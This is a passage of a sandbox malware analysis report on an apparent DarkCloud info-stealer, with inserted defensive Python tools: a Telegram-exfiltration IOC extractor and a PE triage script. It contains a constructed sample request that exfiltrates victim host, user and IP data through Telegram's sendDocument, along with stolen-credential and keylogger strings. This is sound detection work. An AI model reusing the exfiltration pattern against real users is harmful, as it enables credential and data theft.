Source: MSM8C42iAN.exe, 00000000.00000003.1442468987.0000000003451000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442490992.000000000065C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://showip.net/
Source: MSM8C42iAN.exe, 00000000.00000003.1442468987.0000000003451000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442490992.000000000065C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://showip.net/?checkip=
Source: MSM8C42iAN.exe, 00000000.00000003.1442490992.000000000065C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://unpkg.com/leaflet
Source: MSM8C42iAN.exe, 00000000.00000003.1403080623.00000000005D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: MSM8C42iAN.exe, 00000000.00000003.1403080623.00000000005D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MSM8C42iAN.exe, 00000000.00000003.1442535526.000000000061F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442510011.0000000000641000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7
Source: MSM8C42iAN.exe, 00000000.00000003.1442468987.0000000003451000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442490992.000000000065C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.openstreetmap.org/copyright
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49934 version: TLS 1.2
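The Networking entries above show the whole exfiltration pattern in one place: a GET to showip.net with the User-Agent `Project1` (the default project name of a new Visual Basic 6 project, matching the `Project1.vbp` path string in System Summary), followed by repeated `sendDocument` POSTs to the Telegram Bot API whose `caption` parameter carries a `DC-KL` or `DC-SC` tag and the victim's hostname, username and public IP. The block below is an added triage helper written for this page; it is not code from the sandbox report or from the DarkCloud sample. Given HTTP request records in this shape, it extracts the bot id, token, `chat_id`, caption tag and victim fields, flags the public-IP check, and prints a defanged IOC with the token masked, since a Telegram bot token is a live credential for the attacker's channel. The sample requests are constructed (fake bot id and token, fake `chat_id`, RFC 5737 address); the header names, the `DC-XX:::host\user\ip` caption layout and the multipart boundary are taken from the entries above.

```python
"""Added triage helper for this page (not from the sandbox report or the
DarkCloud sample): pull Telegram exfil IOCs out of HTTP request records and
flag the showip.net public-IP check that precedes them."""
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

TELEGRAM_HOSTS = {"api.telegram.org"}
IP_CHECK_HOSTS = {"showip.net"}   # public-IP lookup seen in the report
VB6_DEFAULT_UA = "Project1"       # User-Agent on the showip.net GET above
# The same multipart boundary appears in every POST listed in the report,
# so it looks hardcoded rather than generated per request; treat it as an IOC.
HARDCODED_BOUNDARY = "3fbd04f5-b1ed-4060-99b9-fca7ff59c113"

# Telegram Bot API path: /bot<numeric id>:<token>/<method>
BOT_PATH = re.compile(r"^/bot(?P<bot_id>\d+):(?P<token>[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)$")
# Caption layout used by the sample: <tag>:::<hostname>\<username>\<public ip>
DC_CAPTION = re.compile(r"^(?P<tag>DC-[A-Z]{2}):::(?P<host>[^\\]+)\\(?P<user>[^\\]+)\\(?P<ip>[0-9.]+)$")


def parse_request(raw: str):
    """Split a raw HTTP request head into (method, target, {header: value})."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def telegram_iocs(raw: str) -> Optional[dict]:
    """Return the exfil IOCs if `raw` is a Telegram Bot API call, else None."""
    _method, target, headers = parse_request(raw)
    if headers.get("host") not in TELEGRAM_HOSTS:
        return None
    parts = urlsplit(target)
    m = BOT_PATH.match(parts.path)
    if not m:
        return None
    query = parse_qs(parts.query)
    ioc = {
        "bot_id": m["bot_id"],
        "token": m["token"],
        "api_method": m["method"],
        "chat_id": query.get("chat_id", [None])[0],
        "tag": None, "victim_host": None, "victim_user": None, "victim_ip": None,
        "content_length": int(headers.get("content-length", "0")),
        "boundary_reused": HARDCODED_BOUNDARY in headers.get("content-type", ""),
    }
    cap = DC_CAPTION.match(query.get("caption", [""])[0])
    if cap:
        ioc.update(tag=cap["tag"], victim_host=cap["host"],
                   victim_user=cap["user"], victim_ip=cap["ip"])
    return ioc


def ip_check_beacon(raw: str) -> bool:
    """True for the pre-exfil public-IP lookup (showip.net with the VB6 default UA)."""
    _method, _target, headers = parse_request(raw)
    return headers.get("host") in IP_CHECK_HOSTS and headers.get("user-agent") == VB6_DEFAULT_UA


def classify_request(raw: str) -> str:
    if telegram_iocs(raw) is not None:
        return "telegram-exfil"
    if ip_check_beacon(raw):
        return "public-ip-check"
    return "none"


def defang(ioc: dict) -> str:
    """Shareable form: host defanged, bot token masked (it is a live credential)."""
    tok = ioc["token"]
    return (f"api.telegram[.]org/bot{ioc['bot_id']}:{tok[:4]}...{tok[-4:]} "
            f"chat_id={ioc['chat_id']} tag={ioc['tag']} "
            f"victim={ioc['victim_host']}\\{ioc['victim_user']}")


# Constructed samples shaped like the report's entries; nothing here is real.
SAMPLE_EXFIL = (
    "POST /bot1234567890:AAAAexampleTOKENnotReal_0123456789abc/sendDocument"
    "?chat_id=987654321&caption=DC-KL:::victim-PC\\alice\\203.0.113.7 HTTP/1.1\n"
    "Accept: */*\n"
    "Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0)\n"
    "Host: api.telegram.org\n"
    "Content-Length: 8455\n"
)
SAMPLE_IPCHECK = "GET / HTTP/1.1\nUser-Agent: Project1\nHost: showip.net\n"
SAMPLE_BENIGN = "GET /bot/updates HTTP/1.1\nHost: example.com\nUser-Agent: curl/8.0\n"

if __name__ == "__main__":
    for raw in (SAMPLE_EXFIL, SAMPLE_IPCHECK, SAMPLE_BENIGN):
        print(classify_request(raw))
    print(defang(telegram_iocs(SAMPLE_EXFIL)))
```

Two caveats when turning this into a production rule. The request head is only visible here because the sandbox terminates TLS; on a real network the Telegram exfil shows up as TLS 1.2 to 149.154.167.220:443 with SNI `api.telegram.org`, which is why the Suricata signatures above (2852388, 2045300) exist and why the low-severity showip.net GET over plain HTTP is often the more practical early indicator. Legitimate software also uses the Bot API, so the decision should rest on the `DC-` caption layout, the fixed boundary and the repeated `sendDocument` calls rather than on the host alone.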

System Summary

Source: MSM8C42iAN.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: MSM8C42iAN.exe Static PE information: Resource name: CUSTOM type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
Source: MSM8C42iAN.exe Binary or memory string: OriginalFilenamesootiest.exe vs MSM8C42iAN.exe
Source: MSM8C42iAN.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: MSM8C42iAN.exe Binary or memory string: D*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp4A@=
Source: classification engine Classification label: mal100.troj.spyw.winEXE@2/18@2/2
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Mutant created: NULL
Source: MSM8C42iAN.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: MSM8C42iAN.exe, 00000000.00000003.1403774208.00000000005C1000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1404088936.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1403654652.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, LogqueintiseRngmeEXkkcAcRDShRzsDXooICEfirelit.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: MSM8C42iAN.exe ReversingLabs: Detection: 65%
Source: unknown Process created: C:\Users\user\Desktop\MSM8C42iAN.exe "C:\Users\user\Desktop\MSM8C42iAN.exe"
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: msvbvm60.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: vb6zz.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: sxs.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: winsqlite3.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: vbscript.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: msxml3.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: mlang.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: msxml3.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: esscli.dll
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EE09B103-97E0-11CF-978F-00A02463E06F}\InprocServer32
Source: Binary string: W.pdb4 source: MSM8C42iAN.exe
Source: MSM8C42iAN.exe Static PE information: real checksum: 0x7e01c should be: 0x796ef
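Two of the static indicators above, the RWX .text section and the header checksum that does not match the file, can be reproduced from the raw PE headers without any third-party library. The script below is an added example, not part of the sandbox report and not code from the sample; it builds a constructed minimal PE32 image in memory (the mismatching checksum value 0x7e01c is copied from the report's "real checksum" figure so the output mirrors it, everything else about the image is invented) and runs the same checks a triage analyst would run on the real file with `python pe_triage.py MSM8C42iAN.exe`. The checksum routine is the CheckSumMappedFile algorithm as reimplemented in tools such as pefile. One caveat worth keeping in mind: Windows only enforces the header checksum for drivers and certain system images, so for a user-mode executable a wrong value is a hint that the file was patched or packed after linking, not something that stops it from loading.

```python
"""Static PE triage for a writable code section, stripped relocations and a
header checksum mismatch. Added example; the sample PE it builds is constructed."""
import struct
import sys

# Section characteristics (winnt.h)
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# COFF file characteristics
IMAGE_FILE_RELOCS_STRIPPED = 0x0001
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_32BIT_MACHINE = 0x0100


def pe_checksum(data, checksum_offset):
    """CheckSumMappedFile: sum the file as little-endian 32-bit words with
    end-around carry, skipping the CheckSum field, fold to 16 bits, add size."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def inspect_pe(data):
    """Parse DOS/COFF/optional/section headers and return triage findings."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (machine, nsections, _ts, _symptr, _nsyms,
     opt_size, file_chars) = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):        # PE32 / PE32+; CheckSum is at +64 in both
        raise ValueError("unknown optional header magic 0x%x" % magic)
    checksum_off = opt + 64
    stated = struct.unpack_from("<I", data, checksum_off)[0]
    computed = pe_checksum(data, checksum_off)

    findings = []
    if stated != computed:
        findings.append("checksum mismatch: header 0x%x, computed 0x%x" % (stated, computed))
    if file_chars & IMAGE_FILE_RELOCS_STRIPPED:
        findings.append("relocations stripped (image cannot be rebased, so no ASLR)")
    rwx = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
    sections = []
    for i in range(nsections):
        (name, _vsize, _va, _rawsize, _rawptr, _, _, _, _,
         flags) = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        name = name.rstrip(b"\0").decode("ascii", "replace")
        sections.append((name, flags))
        if flags & rwx == rwx:
            findings.append("writable code section: %s (self-modifying or unpacked in place?)" % name)
    return {"machine": machine, "sections": sections,
            "checksum": (stated, computed), "findings": findings}


def build_sample_pe(stamped_checksum=None, text_flags=IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ):
    """Constructed minimal PE32 with a single .text section (not the real sample).
    stamped_checksum=None writes the correct checksum; any other value is stored as-is."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                      # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224,
                       IMAGE_FILE_RELOCS_STRIPPED | IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_32BIT_MACHINE)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)                      # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                    # ImageBase
    struct.pack_into("<I", opt, 60, 0x200)                       # SizeOfHeaders
    sect = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200,
                       0, 0, 0, 0, text_flags)
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sect
    image = bytearray(headers.ljust(0x200, b"\0") + (b"\xC3" * 16).ljust(0x200, b"\0"))
    checksum_off = 0x40 + 4 + 20 + 64
    value = pe_checksum(bytes(image), checksum_off) if stamped_checksum is None else stamped_checksum
    struct.pack_into("<I", image, checksum_off, value)
    return bytes(image)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            report = inspect_pe(fh.read())
    else:
        # Mirror the report: RWX .text plus the wrong checksum value it lists.
        rwx_text = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
        report = inspect_pe(build_sample_pe(0x7E01C, rwx_text))
    for finding in report["findings"]:
        print(finding)
```

Run without arguments it prints the three findings for the constructed image; pointed at a real file it reports the same three properties for that file.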
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process information set: NOOPENFILEERRORBOX (21 identical events)
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX (2 identical events)
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Window / User API: foregroundWindowGot 1776
Source: WebData.0.dr Binary or memory string: dev.azure.comVMware20,11696497155j
Source: WebData.0.dr Binary or memory string: global block list test formVMware20,11696497155
Source: WebData.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: WebData.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: MSM8C42iAN.exe, 00000000.00000003.1443978870.000000000061F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442535526.000000000061F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000061F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: WebData.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: MSM8C42iAN.exe, 00000000.00000003.1404206426.00000000005C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x\ctivebrokers.co.inVMware20,11696497155d
Source: WebData.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
Source: WebData.0.dr Binary or memory string: tasks.office.comVMware20,11696497155o
Source: WebData.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: WebData.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: WebData.0.dr Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: WebData.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: WebData.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: WebData.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: WebData.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: WebData.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: WebData.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: WebData.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: WebData.0.dr Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: WebData.0.dr Binary or memory string: AMC password management pageVMware20,11696497155
Source: WebData.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: WebData.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: MSM8C42iAN.exe, 00000000.00000003.1404206426.00000000005C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696497155P}\
Source: WebData.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: WebData.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: WebData.0.dr Binary or memory string: discord.comVMware20,11696497155f
Source: MSM8C42iAN.exe, 00000000.00000003.1404206426.00000000005C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ctivebrokers.co.inVMware20,11696497155d
Source: WebData.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: WebData.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: WebData.0.dr Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: WebData.0.dr Binary or memory string: outlook.office.comVMware20,11696497155s
Source: WebData.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: WebData.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: WebData.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:25]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1404206426.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:03]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:25]<<Program Manager
Source: MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%SystemRoot%\system32\dnsapi.dll,-10355:25]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.0000000000616000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5:46]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager>>
